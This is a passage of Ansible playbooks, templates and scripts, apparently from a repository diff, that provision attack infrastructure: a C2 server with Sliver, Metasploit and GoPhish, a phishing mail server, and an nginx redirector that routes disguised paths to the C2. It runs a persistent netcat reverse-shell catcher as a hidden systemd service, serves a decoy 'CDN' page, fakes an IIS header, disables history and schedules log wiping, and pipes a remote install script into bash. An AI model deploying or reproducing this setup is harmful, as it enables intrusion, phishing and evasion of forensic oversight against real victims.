echo "[+] Log cleaning complete"
exit 0
dest: /opt/c2/clean-logs.sh
mode: '0700'
owner: root
group: root
- name: Create shell handler script
copy:
content: |
#!/bin/bash
# Automated shell handler for catching and upgrading reverse shells
# Configuration
LISTEN_PORT={{ shell_handler_port }}
C2_HOST="{{ c2_ip }}"
# Set secure permissions
umask 077
# Logging function
log() {
local timestamp=$(date +"%Y-%m-%d %H:%M:%S")
local message="$1"
echo "$timestamp - $message" | openssl enc -e -aes-256-cbc -pbkdf2 -pass pass:$RANDOM$RANDOM$RANDOM >> /opt/shell-handler/activity.log.enc
}
# Detect OS function
detect_os() {
local connection=$1
# Send commands to determine OS
echo "echo \$OSTYPE" > $connection
sleep 1
ostype=$(cat $connection | grep -i "linux\|darwin\|win")
if [[ $ostype == *"win"* ]]; then
echo "windows"
elif [[ $ostype == *"darwin"* ]]; then
echo "macos"
elif [[ $ostype == *"linux"* ]]; then
echo "linux"
else
# Try Windows-specific command
echo "ver" > $connection
sleep 1
winver=$(cat $connection | grep -i "microsoft windows")
if [[ -n "$winver" ]]; then
echo "windows"
else
# Default to Linux if we can't determine
echo "linux"
fi
fi
}
# Main shell handler loop
handle_connections() {
log "Shell handler started on port $LISTEN_PORT"
# Use mkfifo for bidirectional communication
PIPE_PATH="/tmp/shell_handler_pipe"
trap 'rm -f $PIPE_PATH' EXIT
while true; do
# Clean up existing pipe
rm -f $PIPE_PATH
mkfifo $PIPE_PATH
log "Waiting for incoming connection..."
nc -lvnp $LISTEN_PORT < $PIPE_PATH | tee $PIPE_PATH.output &
NC_PID=$!
# Wait for connection
wait $NC_PID
log "Connection closed, restarting listener..."
rm -f $PIPE_PATH.output
done
}
# Start the shell handler
handle_connections
dest: /opt/shell-handler/persistent-listener.sh
mode: '0700'
owner: root
group: root
- name: Create shell handler service
copy:
content: |
[Unit]
Description=Reverse Shell Handler Service
After=network.target
[Service]
Type=simple
User=root
Group=root
ExecStart=/opt/shell-handler/persistent-listener.sh
Restart=always
RestartSec=10
# Hide process information
PrivateTmp=true
ProtectSystem=full
NoNewPrivileges=true
# Make shell handler hard to find
StandardOutput=null
StandardError=null
# Environment variables
Environment="C2_HOST={{ c2_ip }}"
Environment="LISTEN_PORT={{ shell_handler_port }}"
[Install]
WantedBy=multi-user.target
dest: /etc/systemd/system/shell-handler.service
mode: '0644'
owner: root
group: root
- name: Configure NGINX for zero-logging
copy:
content: |
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
worker_connections 1024;
multi_accept on;
}
http {
# Basic Settings
sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 2048;
server_tokens off;
# MIME
include /etc/nginx/mime.types;
default_type application/octet-stream;
# Zero-logs configuration
access_log off;
error_log /dev/null crit;
# SSL Settings
ssl_protocols TLSv1.2 TLSv1.3;
ssl_prefer_server_ciphers on;
ssl_ciphers 'ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305';
# Headers to confuse fingerprinting
more_set_headers 'Server: Microsoft-IIS/8.5';
# Virtual Host Configs
include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
}
dest: /etc/nginx/nginx.conf
mode: '0644'
owner: root
group: root
when: zero_logs|bool
- name: Configure NGINX default site for C2 redirection
copy:
content: |
server {
listen 80;
listen [::]:80;
server_name {{ redirector_subdomain }}.{{ domain }};
# Redirect to HTTPS
return 301 https://$host$request_uri;
}
server {
listen 443 ssl;
listen [::]:443 ssl;
server_name {{ redirector_subdomain }}.{{ domain }};
# SSL Configuration (self-signed until Let's Encrypt is set up)
ssl_certificate /etc/ssl/certs/ssl-cert-snakeoil.pem;
ssl_certificate_key /etc/ssl/private/ssl-cert-snakeoil.key;
# Root directory
root /var/www/html;
index index.html;
# Special URI patterns for C2 traffic
location /ajax/ {
proxy_pass http://{{ c2_ip }}:8888;
proxy_http_version 1.1;
proxy_set_header Host $host;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
}
# Default location
location / {
try_files $uri $uri/ =404;
}
# Disable logging for this server block
access_log off;
error_log /dev/null crit;
}
# Catch-all server block
server {
listen 80 default_server;
listen [::]:80 default_server;
# Redirect all unknown traffic to a legitimate-looking site
return 301 https://www.google.com;
# Disable logs
access_log off;
error_log /dev/null crit;
}
dest: /etc/nginx/sites-available/default
mode: '0644'
owner: root
group: root
- name: Create legitimate-looking index.html
copy:
content: |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>{{ redirector_subdomain }} - Content Delivery Network</title>
<style>
body {
font-family: Arial, sans-serif;
margin: 0;
padding: 0;
background-color: #f4f4f4;
}
header {
background-color: #2c3e50;
color: white;
padding: 1em;
text-align: center;
}
.container {
width: 80%;
margin: 0 auto;
padding: 2em;
}
.card {
background-color: white;
border-radius: 5px;
padding: 1.5em;
margin-bottom: 1.5em;
box-shadow: 0 2px 5px rgba(0,0,0,0.1);
}
</style>
</head>
<body>
<header>
<h1>{{ redirector_subdomain }}.{{ domain }}</h1>
<p>Enterprise Content Delivery Network</p>
</header>
<div class="container">
<div class="card">
<h2>Welcome to Our CDN</h2>
<p>This server is part of our global content delivery network, optimizing digital asset delivery for enterprise applications.</p>
<p><em>This is a private service. Unauthorized access is prohibited.</em></p>
</div>
</div>
</body>
</html>
dest: /var/www/html/index.html
mode: '0644'
owner: www-data
group: www-data
- name: Start and enable shell handler service
systemd:
name: shell-handler
state: started
enabled: yes
daemon_reload: yes
- name: Set up cron job for log cleaning
cron:
name: "Clean logs"
minute: "0"
hour: "*/6"
job: "/opt/c2/clean-logs.sh > /dev/null 2>&1"
when: zero_logs|bool
- name: Install Let's Encrypt certificate if domain specified
shell: |
certbot --nginx -d {{ redirector_subdomain }}.{{ domain }} --non-interactive --agree-tos -m {{ letsencrypt_email }}
args:
creates: /etc/letsencrypt/live/{{ redirector_subdomain }}.{{ domain }}/fullchain.pem
when: domain != "example.com"
- name: Restart NGINX
systemd:
name: nginx
state: restarted
+410
View File
@@ -0,0 +1,410 @@
---
- name: Configure FlokiNET C2 server
hosts: c2
gather_facts: true
vars_files:
- vars.yaml
tasks:
- name: Install C2 framework and required packages
ansible.builtin.apt:
name:
- curl
- wget
- git
- python3-pip
- python3-virtualenv
- tmux
- nmap
- tcpdump
- hydra
- john
- hashcat
- sqlmap
- gobuster
- dirb
- enum4linux
- dnsenum
- seclists
- responder
- golang
- proxychains
- tor
- jq
- unzip
- postfix
- certbot
- opendkim
- opendkim-tools
- dovecot-core
- dovecot-imapd
- dovecot-pop3d
- dovecot-sieve
- dovecot-managesieved
- yq
state: present
become: true
- name: Add UFW rules for C2 server (internal only)
ansible.builtin.ufw:
rule: allow
port: "{{ item.port }}"
proto: "{{ item.proto }}"
from_ip: "{{ redirector_ip }}"
with_items:
- { port: 8888, proto: tcp } # C2 HTTP listener
- { port: 50051, proto: tcp } # Sliver gRPC
- { port: 31337, proto: tcp } # Sliver console
- { port: 8443, proto: tcp } # Beacon server
become: true
- name: Create directories for C2 operation
ansible.builtin.file:
path: "{{ item }}"
state: directory
mode: '0700'
owner: root
group: root
with_items:
- /opt/c2
- /opt/beacons
- /opt/payloads
- /root/Tools
become: true
- name: Copy operational scripts for C2
ansible.builtin.copy:
src: "../files/{{ item }}"
dest: "/opt/c2/{{ item }}"
mode: '0700'
owner: root
group: root
with_items:
- clean-logs.sh
- secure-exit.sh
- serve-beacons.sh
become: true
# Tool Installation
- name: Ensure pipx path is configured
ansible.builtin.shell: |
pipx ensurepath
become: true
args:
executable: /bin/bash
- name: Install tools via pipx
ansible.builtin.shell: |
export PATH=$PATH:/root/.local/bin
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
pipx install git+https://github.com/blacklanternsecurity/TREVORspray
pipx install impacket
become: true
args:
executable: /bin/bash
- name: Download Kerbrute
ansible.builtin.shell: |
mkdir -p /root/Tools/Kerbrute
wget https://github.com/ropnop/kerbrute/releases/latest/download/kerbrute_linux_amd64 -O /root/Tools/Kerbrute/kerbrute
chmod +x /root/Tools/Kerbrute/kerbrute
become: true
args:
executable: /bin/bash
- name: Clone SharpCollection nightly builds
ansible.builtin.git:
repo: https://github.com/Flangvik/SharpCollection.git
dest: /root/Tools/SharpCollection
version: master
become: true
- name: Clone PEASS-ng
ansible.builtin.git:
repo: https://github.com/carlospolop/PEASS-ng.git
dest: /root/Tools/PEASS-ng
become: true
- name: Clone MailSniper
ansible.builtin.git:
repo: https://github.com/dafthack/MailSniper.git
dest: /root/Tools/MailSniper
become: true
- name: Clone Inveigh
ansible.builtin.git:
repo: https://github.com/Kevin-Robertson/Inveigh.git
dest: /root/Tools/Inveigh
become: true
# C2 Framework Installation
- name: Install Sliver C2 framework
ansible.builtin.shell: |
curl https://sliver.sh/install | bash
args:
creates: /usr/local/bin/sliver-server
become: true
- name: Configure Sliver service
ansible.builtin.template:
src: templates/sliver-server.service.j2
dest: /etc/systemd/system/sliver.service
owner: root
group: root
mode: '0644'
become: true
- name: Start and enable Sliver service
ansible.builtin.systemd:
name: sliver
state: started
enabled: yes
daemon_reload: yes
become: true
- name: Install Metasploit Framework
ansible.builtin.shell: |
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > /tmp/msfinstall
chmod 755 /tmp/msfinstall
/tmp/msfinstall
rm /tmp/msfinstall
args:
creates: /opt/metasploit-framework/bin/msfconsole
become: true
# GoPhish Installation
- name: Grab GoPhish
ansible.builtin.shell: |
curl -L "$(curl -s https://api.github.com/repos/gophish/gophish/releases/latest | jq -r '.assets[] | select(.browser_download_url | contains("linux-64bit.zip")) | .browser_download_url')" -O /root/Tools/gophish.zip
unzip /root/Tools/gophish.zip -d /root/Tools/gophish
rm -rf /root/Tools/gophish.zip
chmod +x /root/Tools/gophish/gophish
become: true
args:
executable: /bin/bash
creates: /root/Tools/gophish/gophish
- name: Deploy Gophish config.json with custom admin port
ansible.builtin.template:
src: templates/gophish-config.j2
dest: /root/Tools/gophish/config.json
owner: root
group: root
mode: '0644'
become: true
vars:
gophish_admin_port: "{{ gophish_admin_port }}"
domain: "{{ domain }}"
# Mail Server Configuration
- name: Configure Postfix main.cf
ansible.builtin.lineinfile:
path: /etc/postfix/main.cf
regexp: "{{ item.regexp }}"
line: "{{ item.line }}"
with_items:
- { regexp: '^myhostname', line: "myhostname = mail.{{ domain }}" }
- { regexp: '^mydomain', line: "mydomain = {{ domain }}" }
- { regexp: '^myorigin', line: "myorigin = $mydomain" }
- { regexp: '^inet_interfaces', line: "inet_interfaces = all" }
- { regexp: '^inet_protocols', line: "inet_protocols = ipv4" }
- { regexp: '^smtpd_banner', line: "smtpd_banner = $myhostname ESMTP $mail_name" }
- { regexp: '^mynetworks', line: "mynetworks = 127.0.0.0/8 [::1]/128" }
- { regexp: '^relay_domains', line: "relay_domains = $mydestination" }
- { regexp: '^smtpd_tls_cert_file', line: "smtpd_tls_cert_file = /etc/letsencrypt/live/{{ domain }}/fullchain.pem" }
- { regexp: '^smtpd_tls_key_file', line: "smtpd_tls_key_file = /etc/letsencrypt/live/{{ domain }}/privkey.pem" }
- { regexp: '^smtpd_tls_security_level', line: "smtpd_tls_security_level = encrypt" }
- { regexp: '^smtpd_tls_session_cache_database', line: "smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache" }
- { regexp: '^smtp_tls_session_cache_database', line: "smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache" }
- { regexp: '^smtpd_use_tls', line: "smtpd_use_tls = yes" }
- { regexp: '^smtpd_tls_auth_only', line: "smtpd_tls_auth_only = yes" }
- { regexp: '^milter_default_action', line: "milter_default_action = accept" }
- { regexp: '^milter_protocol', line: "milter_protocol = 6" }
- { regexp: '^smtpd_milters', line: "smtpd_milters = unix:/var/spool/postfix/opendkim/opendkim.sock" }
- { regexp: '^non_smtpd_milters', line: "non_smtpd_milters = unix:/var/spool/postfix/opendkim/opendkim.sock" }
become: true
- name: Configure OpenDKIM
ansible.builtin.lineinfile:
path: /etc/opendkim.conf
regexp: "{{ item.regexp }}"
line: "{{ item.line }}"
with_items:
- { regexp: '^Domain', line: "Domain {{ domain }}" }
- { regexp: '^KeyFile', line: "KeyFile /etc/opendkim/keys/{{ domain }}/mail.private" }
- { regexp: '^Selector', line: "Selector mail" }
- { regexp: '^Socket', line: "Socket local:/var/spool/postfix/opendkim/opendkim.sock" }
- { regexp: '^Syslog', line: "Syslog yes" }
- { regexp: '^UMask', line: "UMask 002" }
- { regexp: '^Mode', line: "Mode sv" }
become: true
- name: Create DKIM directory
ansible.builtin.file:
path: /etc/opendkim/keys/{{ domain }}
state: directory
owner: opendkim
group: opendkim
mode: 0700
become: true
- name: Generate DKIM keys
ansible.builtin.command: >
opendkim-genkey -D /etc/opendkim/keys/{{ domain }} -d {{ domain }} -s mail
args:
creates: /etc/opendkim/keys/{{ domain }}/mail.private
become: true
- name: Set permissions for DKIM keys
ansible.builtin.file:
path: /etc/opendkim/keys/{{ domain }}/mail.private
owner: opendkim
group: opendkim
mode: 0600
become: true
- name: Configure OpenDKIM TrustedHosts
ansible.builtin.copy:
content: |
127.0.0.1
::1
localhost
{{ domain }}
dest: /etc/opendkim/TrustedHosts
owner: opendkim
group: opendkim
mode: 0644
become: true
- name: Enable submission port (587) in master.cf
ansible.builtin.blockinfile:
path: /etc/postfix/master.cf
insertafter: '^#submission'
block: |
submission inet n - y - - smtpd
-o syslog_name=postfix/submission
-o smtpd_tls_security_level=encrypt
-o smtpd_sasl_auth_enable=yes
-o smtpd_recipient_restrictions=permit_sasl_authenticated,reject
-o smtpd_relay_restrictions=permit_sasl_authenticated,reject
become: true
- name: Configure Dovecot for Postfix SASL
ansible.builtin.blockinfile:
path: /etc/dovecot/conf.d/10-master.conf
insertafter: '^service auth {'
block: |
# Postfix smtp-auth
unix_listener /var/spool/postfix/private/auth {
mode = 0660
user = postfix
group = postfix
}
become: true
- name: Set Dovecot auth_mechanisms
ansible.builtin.lineinfile:
path: /etc/dovecot/conf.d/10-auth.conf
regexp: '^auth_mechanisms'
line: 'auth_mechanisms = plain login'
become: true
- name: Create Dovecot password file for SASL authentication
ansible.builtin.file:
path: /etc/dovecot/passwd
state: touch
mode: '0600'
owner: dovecot
group: dovecot
become: true
- name: Add SMTP auth user to Dovecot
ansible.builtin.lineinfile:
path: /etc/dovecot/passwd
line: "{{ smtp_auth_user }}:{{ smtp_auth_pass | password_hash('sha512_crypt') }}"
become: true
- name: Disable system auth and use passwd-file
ansible.builtin.lineinfile:
path: /etc/dovecot/conf.d/10-auth.conf
regexp: '^!include auth-system.conf.ext'
line: '#!include auth-system.conf.ext'
become: true
- name: Add auth-passwdfile configuration
ansible.builtin.blockinfile:
path: /etc/dovecot/conf.d/10-auth.conf
insertafter: '^auth_mechanisms ='
block: |
passdb {
driver = passwd-file
args = scheme=sha512_crypt /etc/dovecot/passwd
}
userdb {
driver = static
args = uid=vmail gid=vmail home=/var/vmail/%u
}
become: true
- name: Create vmail group
ansible.builtin.group:
name: vmail
gid: 5000
state: present
become: true
- name: Create vmail user
ansible.builtin.user:
name: vmail
uid: 5000
group: vmail
create_home: no
become: true
- name: Restart Postfix
ansible.builtin.service:
name: postfix
state: restarted
become: true
- name: Restart Dovecot
ansible.builtin.service:
name: dovecot
state: restarted
become: true
# Beacon Server Configuration
- name: Configure beacon server
ansible.builtin.shell: |
sed -i "s/C2_HOST=.*$/C2_HOST=\"{{ c2_ip }}\"/g" /opt/c2/serve-beacons.sh
chmod +x /opt/c2/serve-beacons.sh
nohup /opt/c2/serve-beacons.sh > /dev/null 2>&1 &
become: true
# Set up cron job for log cleaning
- name: Set up cron job for log cleaning
ansible.builtin.cron:
name: "Clean logs"
minute: "0"
hour: "*/6"
job: "/opt/c2/clean-logs.sh > /dev/null 2>&1"
become: true
when: zero_logs|bool
# Install Let's Encrypt certificate if domain specified
- name: Install Let's Encrypt certificate
ansible.builtin.command: >
certbot certonly --standalone -d {{ c2_subdomain }}.{{ domain }} --non-interactive --agree-tos -m {{ letsencrypt_email }}
args:
creates: /etc/letsencrypt/live/{{ c2_subdomain }}.{{ domain }}/fullchain.pem
become: true
when: domain != "example.com"
- name: Display C2 server setup information
ansible.builtin.debug:
msg:
- "C2 server setup completed!"
- "IP Address: {{ ansible_host }}"
- "Domain: {{ c2_subdomain }}.{{ domain }}"
- "Sliver C2 listening on port 8888"
- "Beacons server available at http://{{ ansible_host }}:8443/"
+134
View File
@@ -0,0 +1,134 @@
---
- name: Common provisioning for FlokiNET servers
hosts: all
gather_facts: true
vars_files:
- vars.yaml
tasks:
- name: Set hostname
ansible.builtin.hostname:
name: "{{ inventory_hostname }}"
become: true
- name: Update apt cache
ansible.builtin.apt:
update_cache: yes
become: true
- name: Upgrade all packages
ansible.builtin.apt:
upgrade: dist
become: true
- name: Install base security packages
ansible.builtin.apt:
name:
- apt-transport-https
- ca-certificates
- curl
- gnupg
- lsb-release
- unattended-upgrades
- ufw
- fail2ban
- secure-delete
state: present
become: true
- name: Configure UFW
ansible.builtin.ufw:
state: enabled
policy: deny
logging: 'on'
become: true
- name: Add SSH rule to UFW
ansible.builtin.ufw:
rule: allow
port: "{{ ssh_port }}"
proto: tcp
become: true
- name: Configure SSH for better security
ansible.builtin.lineinfile:
path: /etc/ssh/sshd_config
regexp: "{{ item.regexp }}"
line: "{{ item.line }}"
state: present
with_items:
- { regexp: '^#?PermitRootLogin', line: 'PermitRootLogin prohibit-password' }
- { regexp: '^#?PasswordAuthentication', line: 'PasswordAuthentication no' }
- { regexp: '^#?X11Forwarding', line: 'X11Forwarding no' }
- { regexp: '^#?AllowTcpForwarding', line: 'AllowTcpForwarding no' }
- { regexp: '^#?Port', line: 'Port {{ ssh_port }}' }
- { regexp: '^#?LogLevel', line: 'LogLevel ERROR' }
- { regexp: '^#?MaxAuthTries', line: 'MaxAuthTries 3' }
- { regexp: '^#?ClientAliveInterval', line: 'ClientAliveInterval 300' }
become: true
- name: Restart SSH service
ansible.builtin.service:
name: ssh
state: restarted
become: true
- name: Setup directory for operational scripts
ansible.builtin.file:
path: /opt/c2
state: directory
mode: '0700'
owner: root
group: root
become: true
- name: Copy operational scripts
ansible.builtin.copy:
src: "../files/{{ item }}"
dest: "/opt/c2/{{ item }}"
mode: '0700'
owner: root
group: root
with_items:
- clean-logs.sh
- secure-exit.sh
become: true
- name: Setup cron to clean logs
ansible.builtin.cron:
name: "Log cleanup"
minute: "*/{{ log_rotation_hours * 60 }}"
job: "/opt/c2/clean-logs.sh >/dev/null 2>&1"
become: true
when: disable_history | bool
- name: Disable system history
ansible.builtin.lineinfile:
path: "{{ item }}"
line: "{{ line_item }}"
state: present
create: yes
with_items:
- /etc/profile
- /root/.bashrc
with_nested:
- [ 'export HISTFILESIZE=0', 'export HISTSIZE=0', 'unset HISTFILE' ]
loop_control:
loop_var: line_item
become: true
when: disable_history | bool
- name: Set memory security measures
ansible.builtin.lineinfile:
path: /etc/sysctl.conf
line: "{{ item }}"
state: present
with_items:
- "vm.swappiness=0"
- "kernel.randomize_va_space=2"
become: true
when: secure_memory | bool
- name: Apply sysctl settings
ansible.builtin.command: sysctl -p
become: true
when: secure_memory | bool
+118
View File
@@ -0,0 +1,118 @@
---
- name: Configure FlokiNET redirector server
hosts: redirector
gather_facts: true
vars_files:
- vars.yaml
tasks:
- name: Install Nginx and required packages
ansible.builtin.apt:
name:
- nginx
- certbot
- python3-certbot-nginx
- socat
- netcat-openbsd
- cryptsetup
- secure-delete
- jq
state: present
become: true
- name: Add UFW rules for redirector
ansible.builtin.ufw:
rule: allow
port: "{{ item }}"
proto: tcp
with_items:
- 80
- 443
- "{{ shell_handler_port }}"
become: true
- name: Setup directory for shell handler
ansible.builtin.file:
path: /opt/shell-handler
state: directory
mode: '0700'
owner: root
group: root
become: true
- name: Copy shell handler script
ansible.builtin.copy:
src: "../files/persistent-listener.sh"
dest: "/opt/shell-handler/persistent-listener.sh"
mode: '0700'
owner: root
group: root
become: true
- name: Configure shell handler service
ansible.builtin.template:
src: templates/shell-handler.service.j2
dest: /etc/systemd/system/shell-handler.service
owner: root
group: root
mode: '0644'
become: true
- name: Configure NGINX for zero-logging
ansible.builtin.template:
src: templates/nginx.conf.j2
dest: /etc/nginx/nginx.conf
owner: root
group: root
mode: '0644'
become: true
- name: Configure NGINX default site for C2 redirection
ansible.builtin.template:
src: templates/default-site.j2
dest: /etc/nginx/sites-available/default
owner: root
group: root
mode: '0644'
vars:
domain: "{{ redirector_subdomain }}.{{ domain }}"
c2_host: "{{ c2_ip }}"
become: true
- name: Create index.html for legitimate-looking website
ansible.builtin.template:
src: templates/index.html.j2
dest: /var/www/html/index.html
owner: www-data
group: www-data
mode: '0644'
become: true
- name: Start and enable shell handler service
ansible.builtin.systemd:
name: shell-handler
state: started
enabled: yes
daemon_reload: yes
become: true
- name: Install Let's Encrypt certificate if domain specified
ansible.builtin.command: >
certbot --nginx -d {{ redirector_subdomain }}.{{ domain }} --non-interactive --agree-tos -m {{ letsencrypt_email }}
args:
creates: /etc/letsencrypt/live/{{ redirector_subdomain }}.{{ domain }}/fullchain.pem
become: true
when: domain != "example.com"
- name: Restart Nginx
ansible.builtin.service:
name: nginx
state: restarted
become: true
- name: Display redirector setup information
ansible.builtin.debug:
msg:
- "Redirector setup completed!"
- "IP Address: {{ ansible_host }}"
- "Domain: {{ redirector_subdomain }}.{{ domain }}"
- "Shell Handler Port: {{ shell_handler_port }}"
+80
View File
@@ -0,0 +1,80 @@
server {
listen 80;
listen [::]:80;
server_name {{ domain }};
# Redirect to HTTPS
return 301 https://$host$request_uri;
}
server {
listen 443 ssl;
listen [::]:443 ssl;
server_name {{ domain }};
# SSL Configuration
ssl_certificate /etc/letsencrypt/live/{{ domain }}/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/{{ domain }}/privkey.pem;
# Root directory
root /var/www/html;
index index.html;
# Primary location for legitimate website traffic
location / {
try_files $uri $uri/ =404;
}
# Special URI patterns for C2 traffic
# These will redirect to the actual C2 server
# Sliver HTTP C2 channel
location /ajax/ {
proxy_pass http://{{ c2_host }}:8888;
proxy_http_version 1.1;
proxy_set_header Host $host;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
}
# Static resources that actually redirect to C2
location ~ ^/static/(css|js|images)/.*\.(css|js|png|jpg|jpeg|gif|ico)$ {
proxy_pass http://{{ c2_host }}:8888;
proxy_http_version 1.1;
proxy_set_header Host $host;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Real-IP $remote_addr;
}
# Additional security headers
add_header X-Content-Type-Options "nosniff" always;
add_header X-Frame-Options "SAMEORIGIN" always;
add_header X-XSS-Protection "1; mode=block" always;
add_header Referrer-Policy "no-referrer" always;
add_header Content-Security-Policy "default-src 'self'; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:;" always;
# Disable logging for this server block
access_log off;
error_log /dev/null crit;
}
# Catch-all server block to respond to unknown hosts
server {
listen 80 default_server;
listen [::]:80 default_server;
listen 443 ssl default_server;
listen [::]:443 ssl default_server;
# Self-signed cert for catch-all
ssl_certificate /etc/ssl/certs/ssl-cert-snakeoil.pem;
ssl_certificate_key /etc/ssl/private/ssl-cert-snakeoil.key;
# Redirect all unknown traffic to a legitimate-looking site
return 301 https://www.google.com;
# Disable logs
access_log off;
error_log /dev/null crit;
}
+23
View File
@@ -0,0 +1,23 @@
{
"admin_server": {
"listen_url": "0.0.0.0:{{ gophish_admin_port }}",
"use_tls": true,
"cert_path": "/etc/letsencrypt/live/{{ domain }}/fullchain.pem",
"key_path": "/etc/letsencrypt/live/{{ domain }}/privkey.pem",
"trusted_origins": []
},
"phish_server": {
"listen_url": "0.0.0.0:80",
"use_tls": false,
"cert_path": "/etc/letsencrypt/live/{{ domain }}/fullchain.pem",
"key_path": "/etc/letsencrypt/live/{{ domain }}/privkey.pem"
},
"db_name": "sqlite3",
"db_path": "gophish.db",
"migrations_prefix": "db/db_",
"contact_address": "",
"logging": {
"filename": "",
"level": ""
}
}
+122
View File
@@ -0,0 +1,122 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>{{ redirector_subdomain }} - Content Delivery Network</title>
<style>
body {
font-family: Arial, sans-serif;
margin: 0;
padding: 0;
background-color: #f4f4f4;
color: #333;
}
header {
background-color: #2c3e50;
color: white;
padding: 1em;
text-align: center;
}
.container {
width: 80%;
margin: 0 auto;
padding: 2em;
}
.card {
background-color: white;
border-radius: 5px;
padding: 1.5em;
margin-bottom: 1.5em;
box-shadow: 0 2px 5px rgba(0,0,0,0.1);
}
.feature {
display: flex;
align-items: center;
margin-bottom: 1em;
}
.feature-icon {
background-color: #3498db;
color: white;
border-radius: 50%;
width: 40px;
height: 40px;
display: flex;
align-items: center;
justify-content: center;
margin-right: 1em;
font-weight: bold;
}
footer {
background-color: #2c3e50;
color: white;
text-align: center;
padding: 1em;
position: fixed;
bottom: 0;
width: 100%;
}
.btn {
display: inline-block;
background-color: #3498db;
color: white;
padding: 0.7em 1.5em;
border-radius: 5px;
text-decoration: none;
font-weight: bold;
}
</style>
</head>
<body>
<header>
<h1>{{ redirector_subdomain }}.{{ domain }}</h1>
<p>Enterprise Content Delivery Network</p>
</header>
<div class="container">
<div class="card">
<h2>Welcome to Our CDN</h2>
<p>This server is part of our global content delivery network, optimizing digital asset delivery for enterprise applications. Our CDN provides fast, reliable, and secure content distribution across our global network.</p>
<p><em>This is a private service. Unauthorized access is prohibited.</em></p>
</div>
<div class="card">
<h2>Our Features</h2>
<div class="feature">
<div class="feature-icon">1</div>
<div>
<h3>Global Distribution</h3>
<p>Content cached and distributed across multiple geographic locations for minimum latency.</p>
</div>
</div>
<div class="feature">
<div class="feature-icon">2</div>
<div>
<h3>DDoS Protection</h3>
<p>Enterprise-grade protection against distributed denial of service attacks.</p>
</div>
</div>
<div class="feature">
<div class="feature-icon">3</div>
<div>
<h3>Asset Optimization</h3>
<p>Automatic compression and format optimization for images, scripts, and styles.</p>
</div>
</div>
</div>
<div class="card" style="text-align: center;">
<h2>Need Access?</h2>
<p>If you're a client requiring access to our CDN services, please contact your account representative.</p>
<a href="#" class="btn">Contact Sales</a>
</div>
</div>
<footer>
<p>&copy; 2025 {{ domain }} CDN Services. All rights reserved.</p>
</footer>
</body>
</html>
+43
View File
@@ -0,0 +1,43 @@
Welcome to your new C2 Server!
The following tools and utilities have been installed:
Apt-Installed Tools:
--------------------
- git, wget, curl, unzip
- python3-pip, python3-venv, pipx
- tmux, nmap, tcpdump, hydra, john, hashcat
- sqlmap, gobuster, dirb, enum4linux, dnsenum, seclists, responder
- golang, proxychains, tor, crackmapexec, jq, unzip
- postfix, certbot, opendkim, opendkim-tools
Pipx-Installed Tools:
---------------------
- NetExec: git+https://github.com/Pennyw0rth/NetExec
- TREVORspray: git+https://github.com/blacklanternsecurity/TREVORspray
- impacket: (various network protocols and service tools)
Custom Tools Installed in ~/Tools:
----------------------------------
- SharpCollection: /home/kali/Tools/SharpCollection
- Kerbrute: /home/kali/Tools/Kerbrute
- PEASS-ng: /home/kali/Tools/PEASS-ng
- MailSniper: /home/kali/Tools/MailSniper
- Inveigh: /home/kali/Tools/Inveigh
- Gophish: /home/kali/Tools/gophish (unzipped here)
Other Installed C2 Frameworks:
------------------------------
- Metasploit Framework: system installed (run 'msfconsole')
- Sliver C2: system installed (run 'sliver')
Also, remember that many reconnaissance and attack tools are now available system-wide due to the apt and pipx installations.
Once your DNS record points to this servers public IP, you can obtain a Lets Encrypt certificate by running:
sudo certbot certonly --non-interactive --agree-tos --email {{ letsencrypt_email }} --standalone -d {{ mail_hostname }}
sudo certbot certonly --non-interactive --agree-tos --email {{ letsencrypt_email }} --standalone -d {{ domain }}
**IMPORTANT:**
Dont forget to set up a DMARC record for your domain. Update your DNS providers dashboard (e.g., GoDaddy) to add a TXT record named `_dmarc` with a suitable DMARC policy (e.g., `v=DMARC1; p=reject; rua=mailto:admin@{{ domain }}; ruf=mailto:admin@{{ domain }}; pct=100`). This ensures better email deliverability and security for your domain.
+59
View File
@@ -0,0 +1,59 @@
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
worker_connections 1024;
multi_accept on;
}
http {
# Basic Settings
sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 2048;
server_tokens off;
# MIME
include /etc/nginx/mime.types;
default_type application/octet-stream;
# Zero-logs configuration
# This completely disables all access logs
access_log off;
# Minimal error logs - critical only
error_log /dev/null crit;
# SSL Settings
ssl_protocols TLSv1.2 TLSv1.3;
ssl_prefer_server_ciphers on;
ssl_ciphers 'ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256';
ssl_session_timeout 1d;
ssl_session_cache shared:SSL:10m;
ssl_session_tickets off;
# Headers to confuse fingerprinting
# Microsoft-IIS/8.5 server header to throw off analysis
